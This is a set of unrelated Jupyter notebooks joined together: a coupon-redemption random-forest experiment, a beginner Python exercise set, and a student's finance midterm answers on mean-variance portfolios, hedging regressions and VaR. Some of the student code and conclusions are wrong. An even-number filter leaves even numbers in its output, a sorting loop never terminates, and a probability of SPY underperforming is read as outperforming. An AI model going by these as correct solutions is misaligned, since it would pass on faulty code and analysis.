1 0.97 0.83 0.90 2240
accuracy 0.98 22518
macro avg 0.98 0.91 0.94 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
One Hot Encoding
###Code
del train_data_merge
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified'},inplace=True)
train_data_merge['income_bracket'].fillna(train_data_merge['income_bracket'].mean(),inplace=True)
train_data_merge.drop(['id'],axis=1,inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
train_data_merge['no_of_children'].astype('int')
train_data_merge = pd.get_dummies(train_data_merge, columns=['age_range','marital_status','rented','family_size','brand_type','category'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classfier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'with OHE')
file_write_cnt += 1
###Output
Classification Report for RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
1 0.96 0.79 0.87 2240
accuracy 0.98 22518
macro avg 0.97 0.89 0.93 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
Label Encoding
###Code
del train_data_merge
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified'},inplace=True)
train_data_merge['income_bracket'].fillna(train_data_merge['income_bracket'].mean(),inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
train_data_merge['no_of_children'].astype('int')
train_data_merge.drop(['id'],axis=1,inplace=True)
for column in ['marital_status','rented','family_size','age_range','brand_type','category']:
label_encode(column)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'with Label Encoding')
file_write_cnt += 1
###Output
Classification Report for RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
1 0.96 0.82 0.88 2240
accuracy 0.98 22518
macro avg 0.97 0.91 0.94 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
Feature Engineering with Treatment of Campaign Date, Transaction Date and using Coupon Redemption percentage as a value to convert categorical columns to integers
###Code
del train_data_merge
del cust_tran_data_expt
campaign_data_expt = campaign_data.copy()
campaign_data_expt['start_date_q'] = campaign_data_expt['start_date'].map(lambda x: date_q(x,'/'))
campaign_data_expt['end_date_q'] = campaign_data_expt['end_date'].map(lambda x: date_q(x,'/'))
campaign_data_expt.drop(['start_date','end_date'],axis=1,inplace=True)
cust_tran_data_expt = cust_tran_data.copy()
cust_tran_data_expt = pd.merge(cust_tran_data_expt,coupon_data,how='inner',on='item_id')
cust_tran_data_expt['tran_date_q'] = cust_tran_data_expt['date'].map(lambda x: date_q(x,'-'))
cust_tran_data_expt.drop('date',axis=1,inplace=True)
for column in ['quantity','coupon_discount','other_discount','selling_price']:
tran_summation_1(column)
cust_tran_data_expt.drop_duplicates(subset=['customer_id','item_id','coupon_id','tran_date_q'], keep='first', inplace=True)
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge = pd.merge(train_data_merge,campaign_data_expt,how='left',on='campaign_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified','income_bracket':'Unspecified'},inplace=True)
train_data_merge.drop('id',axis=1,inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
for column in ['customer_id','coupon_id','item_id','campaign_id','no_of_children','marital_status','rented','family_size','age_range','income_bracket','start_date_q','end_date_q','tran_date_q','brand','category']:
cat_percent(column)
train_data_merge = pd.get_dummies(train_data_merge, columns=['campaign_type','brand_type'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
feature_sel = [5,10,15,23]
rforc = RandomForestClassifier(n_estimators=100)
for i in feature_sel:
rfe = RFE(rforc, i)
rfe.fit(X, y)
# Selecting columns
sel_cols = []
for a, b, c in zip(rfe.support_, rfe.ranking_, X.columns):
if b == 1:
sel_cols.append(c)
print ('Number of features selected are ::',i)
print ('Columns Selected are ::',sel_cols)
# Creating new DataFrame with selected columns only as X
X_sel = X[sel_cols]
# Split data in to train and test
X_sel_train, X_sel_test, y_sel_train, y_sel_test = train_test_split(X_sel, y, train_size=0.7, random_state=7)
# Fit and Predict the model using selected number of features
grid={"n_estimators":[100]}
rforc_cv = GridSearchCV(rforc,grid,cv=10)
rforc_cv.fit(X_sel_train, y_sel_train)
rforc_pred = rforc_cv.predict(X_sel_test)
# Classification Report
print(classification_report(y_sel_test,rforc_pred))
report = pd.DataFrame(classification_report(y_sel_test,rforc_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X_sel.columns),X_sel.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Treating Date and Label Encoding with RFE')
file_write_cnt += 1
###Output
Number of features selected are :: 5
Columns Selected are :: ['customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'income_bracket_redeem_percent']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.98 0.98 0.98 3718
accuracy 0.99 30990
macro avg 0.99 0.99 0.99 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 10
Columns Selected are :: ['tot_coupon_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'brand_redeem_percent']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.97 0.97 0.97 3718
accuracy 0.99 30990
macro avg 0.99 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 15
Columns Selected are :: ['tot_coupon_discount', 'tot_other_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'marital_status_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'end_date_q_redeem_percent', 'brand_redeem_percent', 'category_redeem_percent', 'campaign_type_Y']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.97 0.97 0.97 3718
accuracy 0.99 30990
macro avg 0.98 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 23
Columns Selected are :: ['tot_quantity', 'tot_coupon_discount', 'tot_other_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'no_of_children_redeem_percent', 'marital_status_redeem_percent', 'rented_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'start_date_q_redeem_percent', 'end_date_q_redeem_percent', 'tran_date_q_redeem_percent', 'brand_redeem_percent', 'category_redeem_percent', 'campaign_type_X', 'campaign_type_Y', 'brand_type_Established', 'brand_type_Local']
precision recall f1-score support
0 0.99 1.00 1.00 27272
1 0.98 0.96 0.97 3718
accuracy 0.99 30990
macro avg 0.99 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
|
Assignment Dated 14-12-19.ipynb | ###Markdown
1. Find the list of words that are longer than n from a given list of words
###Code
def long_words(n,str):
words = []
txt = str.split(" ")
for x in txt:
if len(x)>n:
words.append(x)
return words
print(long_words(3, 'Python program to find the list of words that are longer than n from a given list of words.'))
###Output
['Python', 'program', 'find', 'list', 'words', 'that', 'longer', 'than', 'from', 'given', 'list', 'words.']
###Markdown
2 Write a Python function that takes two lists and returns True if they have at least one common member.
###Code
lst1 = [1,2,3,4,5,56]
lst2 = [2,4,5,67,8,3]
def common_member(lst1,lst2):
for x in lst1:
for y in lst2:
if x==y:
return True
print(common_member(lst1,lst2))
###Output
True
###Markdown
3 Write a Python program to print the numbers of a specified list after removing even numbers from it.
###Code
num = [7, 8, 120, 25, 44, 20, 27]
for x in num:
if x%2 == 0:
num.remove(x)
print(num)
###Output
[7, 120, 25, 20, 27]
###Markdown
4 Write a Python program to generate and print a list of first and last 5 elements where the values are square of numbers between 1 and 30 (both included)
###Code
def elements():
l = list()
for x in range(1,31):
l.append(x**2)
return l[:5], l[-5:]
print(elements())
###Output
([1, 4, 9, 16, 25], [676, 729, 784, 841, 900])
###Markdown
5.Write a Python program to find the second smallest number in a list.
###Code
lst = [7, 120, 25, 20, 27]
def smallest_number(lst):
while True:
corrected = False
for i in range(0,len(lst)-1):
if lst[i]>lst[i+1]:
lst[i],lst[i+1] = lst[i+1],lst[i]
corrected = True
return lst[1],lst
smallest_number(lst)
###Output
_____no_output_____
###Markdown
6. Write a Python script to sort (ascending) a dictionary by value
###Code
d = {1: 2, 3: 4, 4: 3, 2: 1, 0: 0}
sorted_d = {}
y = sorted(d.values())
for x in y:
for k,y in d.items():
if x == y:
sorted_d.update({k:y})
print(sorted_d)
###Output
{0: 0, 2: 1, 1: 2, 4: 3, 3: 4}
###Markdown
7.Write a Python program to count number of items in a dictionary value that is a list.
###Code
dict = {'Alex': ['subj1', 'subj2', 'subj3'], 'David': ['subj1', 'subj2']}
count = 0
for k,v in dict.items():
outpt = len(v)
count = count+outpt
print(count)
###Output
5
###Markdown
8.Write a Python program to sort Counter by value.
###Code
d= {'Math':81, 'Physics':83, 'Chemistry':87}
sorted_d = {}
y = sorted(d.values())
for x in y:
for key,val in d.items():
if val==x:
sorted_d.update({key:val})
print(sorted_d)
# other Way
from collections import Counter
x = Counter({'Math':81, 'Physics':83, 'Chemistry':87})
print(x.most_common())
###Output
{'Math': 81, 'Physics': 83, 'Chemistry': 87}
[('Chemistry', 87), ('Physics', 83), ('Math', 81)]
###Markdown
9.Write a Python program to combine values in python list of dictionaries.
###Code
from collections import Counter
item_list = [{'item': 'item1', 'amount': 400}, {'item': 'item2', 'amount': 300}, {'item': 'item1', 'amount': 750}]
result = Counter()
for d in item_list:
result[d['item']] += d['amount']
print(result)
###Output
Counter({'item1': 1150, 'item2': 300})
###Markdown
10.Write a Python program to print all unique values in a dictionary.
###Code
l = [{"V":"S001"}, {"V": "S002"}, {"VI": "S001"}, {"VI": "S005"}, {"VII":"S005"}, {"V":"S009"},{"VIII":"S007"}]
# val for dic in L for val in dic.values()
s = set()
for dic in l:
for val in dic.values():
s.add(val)
print(s)
###Output
{'S005', 'S007', 'S001', 'S009', 'S002'}
|
solutions/mid1/submissions/santosojosephine_141068_6241604_MIDTERM.ipynb | ###Markdown
FINM 367 Midterm 1Josephine Santoso Section 11. False. Mean-variance optimization diversifies assets not according to sharpe ratios. The weights depends on the covariances, not just the volatilities.2. False. Even though the tracking error of LETF in a day is small, LETF does not take into account compounding so it may become huge overtime. If we expect long term that our investments are positive, we would probably want to compound it to gain more returns.3. Given that we only have a year of data and because we don't really trust it, it would be better if we estimate the regression with an intercept because we want to focus more of explaining the variation. Without including an intercept, mean needs to be captured by the betas and this would not be very accurate given the such small sample we have.4. HDG is quite effective in replicating HFRI in sample and out of sample especially with rolling strategy. In sample is obviously better at replicating HFRI than out of sample because there is a lag in the out of sample replication.5. The hedge fund may have regressed their returns on bad factors/standards instead of the 6 Merrill-Lynch style factors. The alphas in the regression depend on the factors that we are regressing it on. Section 2
###Code
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf
import statsmodels.api as sm
import matplotlib.pyplot as plt
import seaborn as sns
from dataclasses import dataclass
import warnings
import scipy.stats
sns.set()
df_merrill = pd.read_excel('hw2/proshares_analysis_data.xlsx', sheet_name='merrill_factors').set_index('date')
df_merrill.head()
df_merrill_excess = df_merrill.apply(lambda x: x - x['USGG3M Index'], axis=1)
df_merrill_excess = df_merrill_excess[['SPY US Equity', 'EEM US Equity', 'EFA US Equity', 'EUO US Equity', 'IWM US Equity']]
df_merrill_excess.head()
###Output
_____no_output_____
###Markdown
Question 1
###Code
# define a function to calculate tangency portfolio
# the input df must have annualized returns and it must be excess returns
def compute_tangency_portfolio(df):
#define sigma matrix
sigma = df.cov()
#define n to be used for the ones vector
n = sigma.shape[0]
#inverse sigma
sigma_inv = np.linalg.inv(sigma)
#define mu
mu = df.mean()
#calculate tangent portfolio, @ is used for matrix multiplication
w_tan = sigma_inv @ mu / (np.ones(n) @ sigma_inv @ mu)
#map omega_tan back to pandas
w_tan = pd.Series(w_tan, index=mu.index)
#return weights of tangency portfolio, sigma_inv, mu
return w_tan, sigma_inv, mu
# annualizing returns
df_merrill_excess_annualized = df_merrill_excess*12
w_tan, sigma_inv_tan , mu_tan = compute_tangency_portfolio(df_merrill_excess_annualized)
w_tan.to_frame('Tangency Weights')
###Output
_____no_output_____
###Markdown
Question 2
###Code
#define a function to calculate target MV portfolio
#the input df must have annualized returns and it must be excess returns
#returns the allocation delta and omega_p (final weights of risky assets)
def target_mv_portfolio(df, target_return):
w_tan, sigma_inv_tan , mu_tan = compute_tangency_portfolio(df)
n = len(w_tan)
# compute allocation
delta = (np.ones(n) @ sigma_inv_tan @ mu_tan)/(mu_tan.transpose() @ sigma_inv_tan @ mu_tan) * target_return
# final weights are allocated weights to risky asset * weights in the risky assets
w_p_star = delta * w_tan
return delta, w_p_star
delta, w_p_star = target_mv_portfolio(df_merrill_excess_annualized, 0.02*12)
print('Allocated to portfolio: ', delta) # this is how much is allocated to the portfolio, 1-delta is allocated to risk free
print('Allocated to risk free: ', 1-delta)
#print(w_p_star) # this is the final weights of the portfolio
w_p_star.to_frame('MV Portfolio weights')
###Output
Allocated to portfolio: 1.15756108337791
Allocated to risk free: -0.15756108337790997
###Markdown
It is borrowing the risk free rate for it to achieve the targeted mean. Question 3
###Code
# function to evaluate performance measure of a portfolio
# input is porfolio weights and data in excess returns
def performance_measure(w_portfolio, df, annualize_factor):
#mean of portfolio is (w_p' * mean excess return) * annualize factor
portfolio_mu = w_portfolio.transpose() @ df.mean() * annualize_factor
#vol of portfolio is sqrt(w_p' * sigma * w_p) * sqrt(annualize_factor)
portfolio_sigma = np.sqrt(w_portfolio.transpose() @ df.cov() @ w_portfolio) * np.sqrt(annualize_factor)
#sharpe ratio of portfolio
portfolio_sharpe = portfolio_mu / portfolio_sigma
# prints portfolio mean, volatility and sharpe ratio
print('mean', round(portfolio_mu,4), ' vol', round(portfolio_sigma,4), 'sharpe ratio ', round(portfolio_sharpe,4))
#return portfolio_mu, portfolio_sigma, portfolio_sharpe
performance_measure(w_p_star, df_merrill_excess, 12)
###Output
mean 0.24 vol 0.1586 sharpe ratio 1.5136
###Markdown
Question 4
###Code
df_merrill_excess_2018 = df_merrill_excess.loc[:'2018',:]
df_merrill_excess_annualized_2018 = df_merrill_excess_2018*12
delta_2018, w_p_star_2018 = target_mv_portfolio(df_merrill_excess_annualized_2018, 0.02*12)
print(delta) # this is how much it is allocated to the portfolio
w_p_star_2018.to_frame('MV Weights')
# performance measure up to 2018
performance_measure(w_p_star_2018, df_merrill_excess_2018, 12)
# performance measure out of sample from 2019 to 2021
df_merrill_excess_2019 = df_merrill_excess.loc['2019':'2021', :]
performance_measure(w_p_star_2018, df_merrill_excess_2019, 12)
###Output
mean 0.3531 vol 0.2387 sharpe ratio 1.479
###Markdown
Question 5Compared to the 5 risky assets, according to Google, commodities tend to be one of the most volatile asset classes (more volatile than the 5 risky assets). Because of this, the out of sample fragility problem would be worse than what we have seen optimizing equities because the MV optimization is sensitive to historical mean returns and covariance matrix. If commodities are volatile, historical mean returns and historical covariance matrix may not reflect on current/future conditions and this would escalate the issue for commodities. Section 3 Question 1Assuming we use excess returns
###Code
X = df_merrill_excess['SPY US Equity']
y = df_merrill_excess['EEM US Equity']
results = sm.OLS(y,X,missing='drop').fit()
results.summary()
###Output
_____no_output_____
###Markdown
For every dollar invested in EEM, I would invest -0.9257 dollar in SPY for the hedged position (this would be the negative of the beta coefficient of SPY in the regression because the beta coefficient of SPY would be the replication). Question 2
###Code
hedged = results.resid # hedged position would just be y - X*beta which is just the residual
hedged
# df is dataframe
# annual_factor is 12 for monthly data
def summary_stats(df, annual_factor):
df_annual = df*annual_factor
mu = df_annual.mean()
# sigma should be annualized by multiplying sqrt from the monthly std -> sigma = df.std()*np.sqrt(12)
# which is equivalent to doing this:
sigma = df_annual.std()/np.sqrt(12)
sharpe = mu/sigma
table = pd.DataFrame({'Mean':mu, 'Volatility':sigma, 'Sharpe':sharpe}).sort_values(by='Sharpe')
return(table)
summary_stats(pd.DataFrame(hedged), 12)
###Output
_____no_output_____
###Markdown
Question 3No, it does not have the same exact mean because we are also taking out the mean of SPY when we are taking the hedged position. The hedged position is also lowering the volatility of EEM.
###Code
summary_stats(df_merrill_excess, 12)
###Output
_____no_output_____
###Markdown
Question 4If we estimated a multifactor regression with IWM and SPY, this regression might be difficult to use especially for out of sample because of the high correlation (0.88) between SPY and IWM. Therefore, we cannot trust this regression coefficients very much as there is a multicollinearity issue.
###Code
def correlation(df):
corr = df.corr()
sns.heatmap(data=corr, cmap = 'Blues', annot=True)
# make diagonals NaN
corr[corr == 1] = None
# rank the correlations and find min and max
corr_rank = corr.unstack().sort_values().dropna()
pair_max = corr_rank.index[-1]
pair_min = corr_rank.index[0]
print(f'MIN Correlation pair is {pair_min}')
print(f'MAX Correlation pair is {pair_max}')
correlation(df_merrill_excess)
# doing the actual regression
X = df_merrill_excess[['SPY US Equity', 'IWM US Equity']]
y = df_merrill_excess['EEM US Equity']
results = sm.OLS(y,X,missing='drop').fit()
results.summary()
###Output
_____no_output_____
###Markdown
Section 4 Question 1
###Code
df_merrill_annualized = df_merrill*12
df_merrill.head()
correlation(df_merrill)
# Descriptive Analysis
summary_stats(df_merrill, 12)
def maximum_drawdown(x):
cum_ret = (1+x).cumprod()
rolling_max = cum_ret.cummax()
drawdown = (cum_ret - rolling_max)/rolling_max
# Find the maximum drawdown
MDD = min(drawdown)
# Find the min date
#print(drawdown.argmin())
#min_date = np.argmin(drawdown)
min_date = drawdown.idxmin() # this is same as argmin but no warnings
# Find the max and recovery date
drawdown_0 = drawdown[drawdown == 0].index # dates with 0 drawdown
max_date = drawdown_0[drawdown_0 < min_date][-1] # last date with drawdown 0 < min date
try:
recovery_date = drawdown_0[drawdown_0 > min_date][0] # first date with drawdown 0 > min date
except:
recovery_date = None
return MDD, min_date, max_date, recovery_date
def other_stats(data):
output = pd.DataFrame(index=data.columns, columns = \
['skewness', 'excess kurtosis', 'VaR(0.05)', 'CVaR(0.05)', 'MDD', 'Peak', 'Bottom', 'Recover'])
output.loc[:,'skewness'] = data.skew()
kurtosis = data.kurtosis()
output.loc[:,'excess kurtosis'] = kurtosis
VaR = data.quantile(0.05)
output.loc[:,'VaR(0.05)'] = VaR
output.loc[:,'CVaR(0.05)'] = data[data <= VaR].mean()
for hf in data.columns:
MDD, bottom, peak, recover = maximum_drawdown(data[hf])
output.loc[hf, 'MDD'] = MDD
output.loc[hf, 'Peak'] = peak
output.loc[hf, 'Bottom'] = bottom
output.loc[hf, 'Recover'] = recover
try:
output.loc[hf, 'Days to Recover'] = recover-peak
except:
output.loc[hf, 'Days to Recover'] = None
return(output)
# Other statistics measures
other_stats(df_merrill)
df_log_merrill = np.log(df_merrill + 1)
df_log_merrill.head() # log returns
###Output
_____no_output_____
###Markdown
What we want to know is how probable is it that SPY outperforms EFA which is basically computing P(SPY > EFA) = P(SPY - EFA > 0)
###Code
df_log_diff = df_log_merrill['SPY US Equity'] - df_log_merrill['EFA US Equity']
df_log_diff.head() # this is the difference of log SPY and log EFA
summary_stats(pd.DataFrame(df_log_diff), 12) # summary statistics
# h is time frame in years
table4 = pd.DataFrame(columns=['h', 'tilde_mu_hat'])
table4['h'] = list(range(2, 31, 2))
table4 = table4.set_index('h')
def p(h, tilde_mu, tilde_sigma):
x = - np.sqrt(h) * tilde_mu / tilde_sigma
val = scipy.stats.norm.cdf(x)
return val
tilde_mu = 0.081056
tilde_sigma = 0.074502
table4['tilde_mu_hat'] = p(table4.index, tilde_mu=tilde_mu, tilde_sigma=tilde_sigma)
table4.T.style
###Output
_____no_output_____
###Markdown
The table above gives us the probability of SPY > EFA given a timeframe h. We are not very confident that SPY will outperform EFA over the next 10 years as the probability of log return of SPY > log return of EFA in 10 years is 0.000290 which is very small. The probability of log return of SPY > log return of EFA decreases over time. Question 2
###Code
m = 60
sigma_roll = df_log_merrill['EFA US Equity'].shift(1).dropna().rolling(m).apply(lambda x: ((x**2).sum()/m)**(0.5), raw=False).dropna()
sigma_roll
plt.plot(sigma_roll)
plt.title('sigma rolling') # just plotting
multiplier = scipy.stats.norm.ppf(0.01)
multiplier
VaR_roll = multiplier*sigma_roll
VaR_roll
plt.plot(VaR_roll)
plt.title('Value at Risk at 1%')
VaR_roll_sep_2021 = VaR_roll['2021-09-30']
VaR_roll_sep_2021
###Output
_____no_output_____ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.